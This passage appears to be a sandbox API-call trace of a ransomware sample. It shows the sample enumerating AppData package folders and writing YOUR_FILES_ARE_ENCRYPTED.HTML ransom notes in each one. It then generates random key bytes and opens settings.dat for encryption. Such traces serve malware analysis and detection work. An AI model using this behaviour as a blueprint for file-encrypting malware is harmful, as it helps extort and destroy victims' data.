ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 1 [0121.231] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 0 [0121.231] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0121.231] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.231] GetProcessHeap () returned 0x600000 [0121.231] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.232] WriteFile (in: hFile=0x320, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.233] CloseHandle (hObject=0x320) returned 1 [0121.233] GetProcessHeap () returned 0x600000 [0121.233] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.233] GetProcessHeap () returned 0x600000 [0121.233] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.233] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0121.233] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.233] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache") returned 96 [0121.233] GetProcessHeap () returned 0x600000 [0121.233] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.233] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache" [0121.233] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\*" [0121.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName=".", cAlternateFileName="")) returned 0x626878 [0121.233] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 1 [0121.233] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 0 [0121.233] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0121.233] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0121.233] GetProcessHeap () returned 0x600000 [0121.234] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.234] WriteFile (in: hFile=0x320, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.235] CloseHandle (hObject=0x320) returned 1 [0121.236] GetProcessHeap () returned 0x600000 [0121.236] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.236] GetProcessHeap () returned 0x600000 [0121.236] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.236] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0121.236] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.236] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState") returned 96 [0121.236] GetProcessHeap () returned 0x600000 [0121.236] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.236] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState" [0121.236] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\*" [0121.236] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.236] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 1 [0121.236] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 0 [0121.236] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.236] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0121.236] GetProcessHeap () returned 0x600000 [0121.237] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.237] WriteFile (in: hFile=0x320, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.238] CloseHandle (hObject=0x320) returned 1 [0121.238] GetProcessHeap () returned 0x600000 [0121.238] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.238] GetProcessHeap () returned 0x600000 [0121.238] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.239] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0121.239] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.239] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState") returned 98 [0121.239] GetProcessHeap () returned 0x600000 [0121.239] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.240] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState" [0121.240] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\*" [0121.240] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0121.240] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 1 [0121.240] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 0 [0121.240] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0121.240] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0121.240] GetProcessHeap () returned 0x600000 [0121.240] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.241] WriteFile (in: hFile=0x320, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.242] CloseHandle (hObject=0x320) returned 1 [0121.242] GetProcessHeap () returned 0x600000 [0121.242] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.242] GetProcessHeap () returned 0x600000 [0121.242] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.242] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0121.242] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.242] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings") returned 94 [0121.242] GetProcessHeap () returned 0x600000 [0121.242] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.242] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings" [0121.242] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\*" [0121.242] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x945587fb, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.244] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x945587fb, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 1 [0121.244] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0121.245] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.245] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\roaming.lock") returned 107 [0121.245] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.245] lstrlenW (lpString=".lock") returned 5 [0121.245] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.245] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x94722408, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x94722408, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0121.245] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.245] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat") returned 107 [0121.245] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.245] lstrlenW (lpString=".dat") returned 4 [0121.245] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.245] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0121.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0121.245] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0121.245] GetProcessHeap () returned 0x600000 [0121.245] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0121.248] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="09") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="83") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="55") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="D8") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="E4") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="F6") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="75") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="5A") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="7F") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="FC") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="38") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="F5") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="30") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="A8") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="B1") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="69") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="7C") returned 2 [0121.248] wsprintfW (in: 